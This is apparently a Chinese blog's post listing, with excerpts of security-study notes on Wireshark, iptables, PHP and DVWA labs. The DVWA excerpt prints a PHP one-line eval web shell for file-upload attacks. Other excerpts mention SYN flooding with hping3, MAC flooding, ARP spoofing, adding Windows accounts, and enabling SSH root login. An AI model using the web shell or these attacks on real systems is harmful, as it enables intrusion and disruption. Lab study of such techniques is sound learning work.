- 博客(17)
- 资源 (2)
- 收藏
- 关注
RSS订阅原创 wireshark拓展(六)
(1)wireshark开发基础使用lua编程语言开发在wireshark打开后到开始抓包,会使用运行init.lua文件在工具-lua当中可以进行开发(2)wireshark开发新协议解释插件在视图-内部-解析器表当中可以查看对应端口的解析器新协议注册此时在wireshark解析器表当中并不能查找到10002端口需要重新启动wiresharkwireshark解析器编写(3)新协议测试...
2020-08-23 19:52:05
277
原创 wireshark辅助工具(五)
一、命令行工具tshark的简单使用读pcap文件wireshark test.pcap 或者tshark -r test.pcap二、dumpcap的简单使用三、edticap的简单使用将infile.pcap中的前10个数据包提取到outfile.pcap中outfile.pcap的内容为将outfile.pcap中每两个数据包提取到一个文件四、mergecap工具的简单使用五、capinfos 工具的简单使用capinfos工具不加任何时,默认显示全部信息可以在wiresh
2020-08-23 18:23:52
383
原创 wireshark网络取证分析(四)
wireshark网络安全传输层安全(1)拒绝服务介绍(2)TCP SYN泛洪案例演示:使用hping3对192.168.40.141进行SYN泛洪攻击wireshark抓包分析
2020-08-23 13:43:24
1493
原创 php学习笔记
一、php语法初步php 是一种运行在服务器端的脚本语言,可以嵌入到html中。1、php代码标记 多种标记来区分php脚本: ASP:<% php 代码 %> 短标记:<?php代码?> 以上两种基本不用。 脚本标记: 标准标记:<?php php代码?>2、PHP注释 习惯:所有的代码在写的过程中必须进行注释,对于初学者而言,注释就是个人学习写代码的思路。PHP中注释分为两种:1、行注释: 一次注释一行 //:后面的
2020-08-22 21:31:36
309
原创 wireshark网络安全(三)
wireshark网络安全一、数据链路层的网络安全(1)针对交换机的安全问题MAC地址欺骗:使用macchanger工具修改mac的时候注意两个问题:首先要关闭网卡,才能修改mac;修改的mac地址的前三个字节要与存在的厂商的mac的前三个字节对应。mac地址泛洪:使用macof工具使用mac泛洪命令前的mac表在kali终端输入mac泛洪再次查看CAM表此时再相互ping几个终端,网络不可达。因为CAM表在不断更新。(2)网络层的网络安全arp欺骗:现在对无线局域网进行arp欺骗
2020-08-21 19:26:39
787
3
原创 wireshark入门(一)
wireshark的使用一、 wireshark入门网络流量捕获和分析的软件,Ethereal 是wireshark的前身。原理:捕获硬件的二进制流量,转换wireshark组装数据包,分析捕获的数据包、识别协议等信息。优势:开源免费,跨平台,可视化,功能强大。基本使用:1、选择网卡2、捕获数据流量选择网卡后双击网卡或者点击start capturing packets按钮开始捕获数据流量3、过滤数据包点击expression,在search拦当中输入tcp(小写),过滤TCP数据包
2020-08-14 22:47:41
280
原创 认识windows
认识windowssystem–>administrator -->user省长 市长 镇长系统权限下输入:whoamint author ity\systemnet user 查看系统有多少用户net user + 用户名 查看指定用户名的信息net user 用户名 密码 /add 添加一个用户query user 查看在线的用户ver 查询操作系统版本windows 5.1、 5.2 --&g
2020-08-12 00:47:18
139
转载 企业优秀运维人员20道必会iptables面试题
企业面试二十题转至老男孩博客企业优秀运维人员20道必会iptables面试题(一)企业面试口试题1、详述iptales工作流程以及规则过滤顺序? 按照链表里面规则的顺序从上往下一条条的匹配,若匹配到某条规则,该规则明确同意还是拒绝,就直接执行。若没有匹配的规则,就按照最后的默认规则来执行。2、iptables有几个表以及每个表有几个链?4表5链 四表: (1) filter(筛选作用,最常用) :INPUT OUTPUT FORWARD
2020-07-26 17:55:11
326
原创 iptables-nat表的应用
NAT表的应用filter表的核心功能:主机防护墙nat表的核心功能:IP及端口的映射转换 1、共享上网 2、端口映射共享上网模式 网关B: eth2 10.0.0.51 配上级网关 10.0.0.2 eth3 172.16.1.51 不配网关 服务器C(局域网内部主机): eth3 172.16.1.52 网关 172.16.1.51步骤(1)服务器C只留一个网卡,使用ipdown命令来禁用多余的网卡: ip
2020-07-26 16:59:19
267
原创 SSH服务器拒绝密码问题
在使用xshell连接linux时,有时候会出现这样的问题:这时,我们只登录Linux主机,然后输入命令修改SSH配置文件:vi /etc/ssh/sshd_config然后找到以下内容:PermitRootLogin without-password 改为 PermitRootLogin yes修改完后输入以下命令重启ssh服务即可:/etc/init.d/ssh restart然后就可以使用xshell登录了。...
2020-07-26 11:18:14
690
1
原创 手动部署企业级防火墙
部署企业级防火墙手动部署防火墙(1)清空所有的规则,用户自定义链以及计数器。 [root@192 ~]# iptables -F [root@192 ~]# iptables -X [root@192 ~]# iptables -Z(2)将默认规则设置为DROP 先设置ssh相关数据为ACCEPT: //两种使用一种就可以 [root@192 ~]# iptables -A INPUT -p tcp -s 192.168.40.0/24 -j ACCEPT [r
2020-07-25 23:52:59
462
原创 iptables详解
iptables详解一、 iptables介绍采用数据包过滤机制工作的,所以会对请求的数据包的包头数据进行分析,并根据预先规定的规则进行匹配来决定是否可以进入主机。iptables主要工作在OSI的二、三、四层。 iptables工作流程小结: 1、防火墙是一层层过滤的。实际是按照配置规则的顺序从上到下,从前到后进行过滤的。 2、如果匹配上规则,即明确表明是阻止还是通过,此时数据包就不在向下匹配新规则了。 3、如果所有规则中没有明确表明是阻止还是通过这个数据包,也就是没有匹配上规则
2020-07-25 02:09:00
1944
原创 小白入门防火墙iptables
iptables防火墙4表5链查看4表5链: man iptables4表:(1)filter(筛选作用,最常用) (2) nat (3)mangle(硬件常使用) (4)raw5链:包含在4表里面,(1)INPUT (2)OUTPUT (3)PREROUTEING (4)POSTROUTING (5)FORWARD增删查改查看表: iptables -t 表名 -L (直接输入iptables -L 打开的是filter这张表)(1)一般查看一个表后面接触 -
2020-07-21 01:14:25
331
原创 Wireshark嗅探和协议分析
Wireshark嗅探和协议分析实验环境1、系统环境:Windows7/8/10操作系统、Centos6.82、浏览器:IE10/113、Wireshark:Version 2.2.54、WinPcap4.1.0.29805、8UFtp 3.8.2.06、Foxmail 7.2实验步骤DHCP协议抓包实验以Win10操作系统为例,鼠标左键单击左下角的开始菜单,选择“设置”选项,...
2020-02-04 01:08:14
916
原创 文件上传漏洞--dvwa
文件上传漏洞–dvwa无防护:目的主机没有对上传文件进行过滤,直接保存上传文件。上传一句话木马shell.php文件并通过浏览器访问加上参数的地址或者使用中国菜刀直接连接,获取shell。//一句话木马(1) shell1.php # eval 使用php函数,例如phpinfo();<?php eval($_REQUEST['seven']);?>eg.http...
2020-02-04 00:40:57
235
VNC-Viewer-6.1.1-Windows-64bit.msi
2020-02-05
PGPDesktop10.1.1_Windows_Inner.zip
2020-02-05
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人